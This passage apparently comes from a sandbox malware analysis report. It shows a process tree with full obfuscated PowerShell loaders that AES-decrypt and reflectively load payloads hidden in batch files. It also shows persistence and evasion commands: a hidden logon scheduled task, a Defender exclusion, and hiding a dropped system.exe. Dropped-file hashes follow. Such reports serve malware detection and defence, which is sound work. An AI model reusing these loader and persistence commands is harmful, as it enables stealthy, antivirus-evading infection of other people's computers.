$KTGgd=$inqUq.Substring(3); break; }}$payloads_var=[string[]]$KTGgd.Split('\');$payload1_var=decompress_function (decrypt_function ([Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')($payloads_var[0])));$payload2_var=decompress_function (decrypt_function ([Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')($payloads_var[1])));execute_function $payload1_var $null;execute_function $payload2_var (,[string[]] (''));3⤵
- Command and Scripting Interpreter: PowerShell
- Modifies registry class
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
- Suspicious use of WriteProcessMemory
PID:2652 -
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Register-ScheduledTask -TaskName 'RuntimeBroker_startup_85_str' -Trigger (New-ScheduledTaskTrigger -AtLogon) -Action (New-ScheduledTaskAction -Execute 'C:\Users\Admin\AppData\Roaming\startup_str_85.vbs') -Settings (New-ScheduledTaskSettingsSet -AllowStartIfOnBatteries -Hidden -ExecutionTimeLimit 0) -RunLevel Highest -Force4⤵
- Command and Scripting Interpreter: PowerShell
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
PID:5088
-
-
C:\Windows\System32\WScript.exe"C:\Windows\System32\WScript.exe" "C:\Users\Admin\AppData\Roaming\startup_str_85.vbs"4⤵
- Checks computer location settings
- Suspicious use of WriteProcessMemory
PID:800 -
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /c ""C:\Users\Admin\AppData\Roaming\startup_str_85.bat" "5⤵
- Suspicious use of WriteProcessMemory
PID:976 -
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -noprofile -windowstyle hidden -ep bypass -command function decrypt_function($param_var){ $aes_var=[System.Security.Cryptography.Aes]::Create(); $aes_var.Mode=[System.Security.Cryptography.CipherMode]::CBC; $aes_var.Padding=[System.Security.Cryptography.PaddingMode]::PKCS7; $aes_var.Key=[System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')('X7Zhl6Khi2ZbZn4/PrAf+8sGbyoXniPMQQRnCuRZwU4='); $aes_var.IV=[System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')('FTiKRMGfSm1nLSyYBeX8aQ=='); $decryptor_var=$aes_var.CreateDecryptor(); $return_var=$decryptor_var.TransformFinalBlock($param_var, 0, $param_var.Length); $decryptor_var.Dispose(); $aes_var.Dispose(); $return_var;}function decompress_function($param_var){ $VWgzw=New-Object System.IO.MemoryStream(,$param_var); $qruKH=New-Object System.IO.MemoryStream; $RPpcy=New-Object System.IO.Compression.GZipStream($VWgzw, [IO.Compression.CompressionMode]::Decompress); $RPpcy.CopyTo($qruKH); $RPpcy.Dispose(); $VWgzw.Dispose(); $qruKH.Dispose(); $qruKH.ToArray();}function execute_function($param_var,$param2_var){ $kflaA=[System.Reflection.Assembly]::('daoL'[-1..-4] -join '')([byte[]]$param_var); $sDziU=$kflaA.EntryPoint; $sDziU.Invoke($null, $param2_var);}$gEOgE = 'C:\Users\Admin\AppData\Roaming\startup_str_85.bat';$host.UI.RawUI.WindowTitle = $gEOgE;$nkdNJ=[System.IO.File]::('txeTllAdaeR'[-1..-11] -join '')($gEOgE).Split([Environment]::NewLine);foreach ($inqUq in $nkdNJ) { if ($inqUq.StartsWith(':: ')) { $KTGgd=$inqUq.Substring(3); break; }}$payloads_var=[string[]]$KTGgd.Split('\');$payload1_var=decompress_function (decrypt_function ([Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')($payloads_var[0])));$payload2_var=decompress_function (decrypt_function ([Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')($payloads_var[1])));execute_function $payload1_var $null;execute_function $payload2_var (,[string[]] (''));6⤵
- Blocklisted process makes network request
- Command and Scripting Interpreter: PowerShell
- Drops startup file
- Suspicious behavior: AddClipboardFormatListener
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of SetWindowsHookEx
PID:2956
-
-
-
-
-
-
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -ExecutionPolicy Bypass Add-MpPreference -ExclusionPath 'C:\Users\Admin\AppData\Local\Temp\Sysinfo.bat'2⤵
- Command and Scripting Interpreter: PowerShell
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
PID:2564
-
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /c ""C:\Users\Admin\AppData\Local\Temp\Sysinfo.bat" "2⤵
- Suspicious use of WriteProcessMemory
PID:4552 -
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -noprofile -windowstyle hidden -ep bypass -command function decrypt_function($param_var){ $aes_var=[System.Security.Cryptography.Aes]::Create(); $aes_var.Mode=[System.Security.Cryptography.CipherMode]::CBC; $aes_var.Padding=[System.Security.Cryptography.PaddingMode]::PKCS7; $aes_var.Key=[System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')('8PMom9RnlfWzjG8MC5lXaac8aBGu+w5gW8NmRz9Kk+g='); $aes_var.IV=[System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')('Q3K43OSBcYlntcFGSbtNow=='); $decryptor_var=$aes_var.CreateDecryptor(); $return_var=$decryptor_var.TransformFinalBlock($param_var, 0, $param_var.Length); $decryptor_var.Dispose(); $aes_var.Dispose(); $return_var;}function decompress_function($param_var){ $YujPS=New-Object System.IO.MemoryStream(,$param_var); $WQOly=New-Object System.IO.MemoryStream; $xgIaW=New-Object System.IO.Compression.GZipStream($YujPS, [IO.Compression.CompressionMode]::Decompress); $xgIaW.CopyTo($WQOly); $xgIaW.Dispose(); $YujPS.Dispose(); $WQOly.Dispose(); $WQOly.ToArray();}function execute_function($param_var,$param2_var){ $zVSXB=[System.Reflection.Assembly]::('daoL'[-1..-4] -join '')([byte[]]$param_var); $RyFSy=$zVSXB.EntryPoint; $RyFSy.Invoke($null, $param2_var);}$tIIDK = 'C:\Users\Admin\AppData\Local\Temp\Sysinfo.bat';$host.UI.RawUI.WindowTitle = $tIIDK;$KlFzN=[System.IO.File]::('txeTllAdaeR'[-1..-11] -join '')($tIIDK).Split([Environment]::NewLine);foreach ($XYyBu in $KlFzN) { if ($XYyBu.StartsWith(':: ')) { $JQyvV=$XYyBu.Substring(3); break; }}$payloads_var=[string[]]$JQyvV.Split('\');$payload1_var=decompress_function (decrypt_function ([Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')($payloads_var[0])));$payload2_var=decompress_function (decrypt_function ([Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')($payloads_var[1])));execute_function $payload1_var $null;execute_function $payload2_var (,[string[]] (''));3⤵
- Command and Scripting Interpreter: PowerShell
- Modifies registry class
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
- Suspicious use of WriteProcessMemory
PID:3976 -
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Register-ScheduledTask -TaskName 'RuntimeBroker_startup_531_str' -Trigger (New-ScheduledTaskTrigger -AtLogon) -Action (New-ScheduledTaskAction -Execute 'C:\Users\Admin\AppData\Roaming\startup_str_531.vbs') -Settings (New-ScheduledTaskSettingsSet -AllowStartIfOnBatteries -Hidden -ExecutionTimeLimit 0) -RunLevel Highest -Force4⤵
- Command and Scripting Interpreter: PowerShell
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
PID:2476
-
-
C:\Windows\System32\WScript.exe"C:\Windows\System32\WScript.exe" "C:\Users\Admin\AppData\Roaming\startup_str_531.vbs"4⤵
- Checks computer location settings
- Suspicious use of WriteProcessMemory
PID:3028 -
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /c ""C:\Users\Admin\AppData\Roaming\startup_str_531.bat" "5⤵
- Suspicious use of WriteProcessMemory
PID:4864 -
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -noprofile -windowstyle hidden -ep bypass -command function decrypt_function($param_var){ $aes_var=[System.Security.Cryptography.Aes]::Create(); $aes_var.Mode=[System.Security.Cryptography.CipherMode]::CBC; $aes_var.Padding=[System.Security.Cryptography.PaddingMode]::PKCS7; $aes_var.Key=[System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')('8PMom9RnlfWzjG8MC5lXaac8aBGu+w5gW8NmRz9Kk+g='); $aes_var.IV=[System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')('Q3K43OSBcYlntcFGSbtNow=='); $decryptor_var=$aes_var.CreateDecryptor(); $return_var=$decryptor_var.TransformFinalBlock($param_var, 0, $param_var.Length); $decryptor_var.Dispose(); $aes_var.Dispose(); $return_var;}function decompress_function($param_var){ $YujPS=New-Object System.IO.MemoryStream(,$param_var); $WQOly=New-Object System.IO.MemoryStream; $xgIaW=New-Object System.IO.Compression.GZipStream($YujPS, [IO.Compression.CompressionMode]::Decompress); $xgIaW.CopyTo($WQOly); $xgIaW.Dispose(); $YujPS.Dispose(); $WQOly.Dispose(); $WQOly.ToArray();}function execute_function($param_var,$param2_var){ $zVSXB=[System.Reflection.Assembly]::('daoL'[-1..-4] -join '')([byte[]]$param_var); $RyFSy=$zVSXB.EntryPoint; $RyFSy.Invoke($null, $param2_var);}$tIIDK = 'C:\Users\Admin\AppData\Roaming\startup_str_531.bat';$host.UI.RawUI.WindowTitle = $tIIDK;$KlFzN=[System.IO.File]::('txeTllAdaeR'[-1..-11] -join '')($tIIDK).Split([Environment]::NewLine);foreach ($XYyBu in $KlFzN) { if ($XYyBu.StartsWith(':: ')) { $JQyvV=$XYyBu.Substring(3); break; }}$payloads_var=[string[]]$JQyvV.Split('\');$payload1_var=decompress_function (decrypt_function ([Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')($payloads_var[0])));$payload2_var=decompress_function (decrypt_function ([Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')($payloads_var[1])));execute_function $payload1_var $null;execute_function $payload2_var (,[string[]] (''));6⤵
- Command and Scripting Interpreter: PowerShell
- Adds Run key to start application
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of WriteProcessMemory
PID:3548 -
C:\Windows\System32\attrib.exe"C:\Windows\System32\attrib.exe" +s +h "C:\Users\Admin\system"7⤵
- Sets file to hidden
- Views/modifies file attributes
PID:4084
-
-
C:\Windows\System32\attrib.exe"C:\Windows\System32\attrib.exe" +s +h "C:\Users\Admin\system\system.exe"7⤵
- Sets file to hidden
- Views/modifies file attributes
PID:4992
-
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /c ""C:\Users\Admin\AppData\Local\Temp\tmpFA1F.tmp.bat""7⤵PID:4764
-
C:\Windows\system32\timeout.exetimeout 38⤵
- Delays execution with timeout.exe
PID:4752
-
-
C:\Users\Admin\system\system.exe"C:\Users\Admin\system\system.exe"8⤵
- Executes dropped EXE
PID:1548
-
-
-
-
-
-
-
Network
MITRE ATT&CK Enterprise v15
Replay Monitor
Loading Replay Monitor...
Downloads
-
Filesize
42B
MD584cfdb4b995b1dbf543b26b86c863adc
SHA1d2f47764908bf30036cf8248b9ff5541e2711fa2
SHA256d8988d672d6915b46946b28c06ad8066c50041f6152a91d37ffa5cf129cc146b
SHA512485f0ed45e13f00a93762cbf15b4b8f996553baa021152fae5aba051e3736bcd3ca8f4328f0e6d9e3e1f910c96c4a9ae055331123ee08e3c2ce3a99ac2e177ce
-
Filesize
2KB
MD5d85ba6ff808d9e5444a4b369f5bc2730
SHA131aa9d96590fff6981b315e0b391b575e4c0804a
SHA25684739c608a73509419748e4e20e6cc4e1846056c3fe1929a8300d5a1a488202f
SHA5128c414eb55b45212af385accc16d9d562adba2123583ce70d22b91161fe878683845512a78f04dedd4ea98ed9b174dbfa98cf696370598ad8e6fbd1e714f1f249
-
Filesize
944B
MD5f3c09cd778e1a0b1fdd6cbc74036bf4b
SHA120c86d7a83204e7a99c3c99acf79f891961e9b5e
SHA2565b74d916934b7c3a1c0ad0c2716827f7a8fbf5722e9cc5a12a74e0e8834e5e25
SHA512fe58e5014c7a5753b204f8e22f5e708642d8aa5e22c0b7b4107d4c8dc95d6ad1f3cbbe2ec823140f2a310437c10c2ea8d8ffb1a191520040f7824c121642fb9c
-
Filesize
1KB
MD5bceed48e720d53a41dfa3c7c73f23f0f
SHA1d06284e9e184a924efb235e8abc8ec19348b8c2d
SHA2562a94a7e6d5247e4f03a36f6c9cd1e24c394bdbcdf46b9a866ad7823d0483d019
SHA512402a0006b17a603c3a8c6ebc566579d1fe1a27e5d834ebe3cb1420d09d829ef261de2b4e62b6fce3624e93fe42dbfa21d4bb7063469c480ae4d9c5568d5df31f
-
Filesize
1KB
MD5b70bb42b5f053a986ba1a544817bf722
SHA1c26f5c74ae56f37efbe7ce61a1a15bd5cc215f13
SHA256b15e56fef36d411e28adfaf6914511300756706527fcfa65598177f5f6a0299b
SHA5121ce6c9261bdc04cab0264689da6a70e3943d7b7db0adb375cf7cfc71ff8505127047f0b9b52ed6e707b6bf388baeafe735955aa4e4ccf231085ff91de2605292
-
Filesize
1KB
MD5dbbf71e9fb59f80938f09809b160e441
SHA18b9a517d846cb9a0a284f77ed88328236a85055f
SHA256e1de59d46c7c47af2d62f7754524b080a706be6b38d55a03733a10c3675598b1
SHA51290b75d43ddb81c710fb8fe2fd15b5c05181c774d3f401e47862006adb1703bc65ad8fead4aaf7a28b8e2bbe7249f3de998bd9432c1e62fa8718a19dacc4b8840
-
Filesize
1KB
MD51cc5e033811a5d520bb4a6904b5c433b
SHA1c159a342ed372790600b3a6ac97e274638a0ce9a
SHA2569e20052dd29dfcd8220dcf271acd3e27f9d6b785d72531043741ef349b48c7a8
SHA512dd8b57e50382a7a84aea3986c3ae8a38ade0fb84a5c9696339487022321be12f08aff9d47455a28137e31a8632cda2490dcf0332c6b3c72e7cfdd10e63e4f429
-
Filesize
944B
MD577d622bb1a5b250869a3238b9bc1402b
SHA1d47f4003c2554b9dfc4c16f22460b331886b191b
SHA256f97ff12a8abf4bf88bb6497bd2ac2da12628c8847a8ba5a9026bdbb76507cdfb
SHA512d6789b5499f23c9035375a102271e17a8a82e57d6f5312fa24242e08a83efdeb8becb7622f55c4cf1b89c7d864b445df11f4d994cf7e2f87a900535bcca12fd9
-
Filesize
944B
MD5eb1ad317bd25b55b2bbdce8a28a74a94
SHA198a3978be4d10d62e7411946474579ee5bdc5ea6
SHA2569e94e7c9ac6134ee30e79498558aa1a5a1ac79a643666c3f8922eed215dd3a98
SHA512d011f266c0240d84470c0f9577cd9e4927309bd19bb38570ca9704ed8e1d159f9bea982a59d3eefef72ce7a10bd81208b82e88ef57c7af587f7437a89769adc0
-
Filesize
944B
MD59c740b7699e2363ac4ecdf496520ca35
SHA1aa8691a8c56500d82c5fc8c35209bc6fe50ab1d9
SHA256be96c91b62ba9ba7072ab89e66543328c9e4395150f9dbe8067332d94a3ecc61
SHA5128885683f96353582eb871209e766e7eba1a72a2837ce27ea298b7b5b169621d1fa3fce25346b6bfd258b52642644234da9559d4e765a2023a5a5fc1f544cc7af
-
Filesize
18.8MB
MD5017ab96e80048ff5c16c045f0b07dd5c
SHA181d29230438596bc35d5c20a3c5077c6f6bf286a
SHA256baf65c88b4d48cb3701f9dc503f9800e06b490e169c8f3668f250052c703ee62
SHA5128a2fb18187f6432a4c266de6dbda7b98d1838838a73dc9a593d2f814336d5842ea3ce101a60714aabc735390560b6c61e66166c0a643646c7e5aa994c59f2987
-
Filesize
262KB
MD5ad0c8112fc6de16730b2c05452bd5a5d
SHA1de5c18c8b52136d3f36eb309d2cab5a94217b80f
SHA2563ca4327561a8b88204b8716306fccf8815ba3ea515d5f213c810355fa66d19c7
SHA5125d854c0cb895c989d06b49b7004ef2747dbbd3225f066cd84792e9c99238f03cd63b3943729a7853b00b49492d5ab0525b37999a97f23a46ce1486ede770f780
-
Filesize
60B
MD5d17fe0a3f47be24a6453e9ef58c94641
SHA16ab83620379fc69f80c0242105ddffd7d98d5d9d
SHA25696ad1146eb96877eab5942ae0736b82d8b5e2039a80d3d6932665c1a4c87dcf7
SHA5125b592e58f26c264604f98f6aa12860758ce606d1c63220736cf0c779e4e18e3cec8706930a16c38b20161754d1017d1657d35258e58ca22b18f5b232880dec82
-
Filesize
284KB
MD5f4d1ac2353407590dd8f02cac6b2104a
SHA19681117cd8ea67bc8b3907004e9ce808ca0187ec
SHA2563c7c299737de3ff60f8c30f000c0a9f3454396acc1dce473e1e1a2696bbc67b7
SHA5127d4e6dbf7ea33a5a020df56e001928ef8b387b8d7eae8d26f5f591790553ab102a7186cd39ef937ab895976b504ae4a2540b7f2405a7d2ab81fbb87575da2082
-
Filesize
141B
MD5943ea75773f7b07665995c9574d530ba
SHA1558bf7e899d3543ed3d8ae04062dbcc020fc8a5e
SHA256e33ff924968f97c4f2293bec3faf01c781b296acee6a3316218fa3dddb356714
SHA5128a58aaa2528e96e66afa281868cd1c1887de5eb8eb034f961c7c27c07217312509e07a797020d5c155dd26512fb2db602cdde54362014efcc9ec3c418e56cd81
-
Filesize
115B
MD5368b9ef45437db3c8d74b131165dac4a
SHA108814e207c36f531b3e3efe6eed7c7f45d3ea90e
SHA256983ace1ff7d7220f5bb2dea998f4f603f7869e013e25f9329af6ba02d58b3681
SHA5121879ec6fad3e5ee3a4e3aefd7edc0cddfb1ab8a4cc5aa8e60fe7ab8d76abaa6e60fc0af9b1477abb9c519b0bb8f4d3f8ee07f925bb2ba1dd7d5692a605223c5b
-
Filesize
115B
MD5d8b0aa12a851fd960ac47498fa371da2
SHA1bab8853105e1e56530d338ceac9ca92fcce018b0
SHA2566cd22a5a0f25e981fe813327be8bd748128c6b4f040da666cb7446139c7f61f8
SHA512bf5c7931971d4d3c4042da1452d4107481766a65d8a4d334d4b522063a498ca0f8e3185760854309610a53d855c517b2557110b858a409128ab9b2dcb04d51c8
-
Filesize
114B
MD583a11e2dd07ab08994530007211b737b
SHA1fd062ce0480df511b63c0bbadabb8b5da64e81e2
SHA25633972f8ea009e89bdd302035e3e949ca3b8db4bb7fd733b2f62a16e52742575c
SHA51286af9e36b608b5f1ee4af5e4f5ea700f0223c4e812d650457d6e72ad712057440c5aac89f45009914224961b01fb0459fdb04cf8c0aa6cc2857dc79828cbd27a
-
Filesize
114B
MD501240672968c73d837a0cf158ca84d95
SHA1008a4ab9d5d9ad02148e129ee8dc58242764a095
SHA256ef753dbe92d4d8769f52b0d564081675185bb435dbf6c1cc68d35e6935346534
SHA512b45d5c92d0d61a318bb37955b9a68d740c363768a69c42884dafc645b7e73a79fff8168a79ebc9a5ed02dd3f3277b7f4815e425cfd6544c612f5e27c26a5860f
-
Filesize
442KB
MD504029e121a0cfa5991749937dd22a1d9
SHA1f43d9bb316e30ae1a3494ac5b0624f6bea1bf054
SHA2569f914d42706fe215501044acd85a32d58aaef1419d404fddfa5d3b48f66ccd9f
SHA5126a2fb055473033fd8fdb8868823442875b5b60c115031aaeda688a35a092f6278e8687e2ae2b8dc097f8f3f35d23959757bf0c408274a2ef5f40ddfa4b5c851b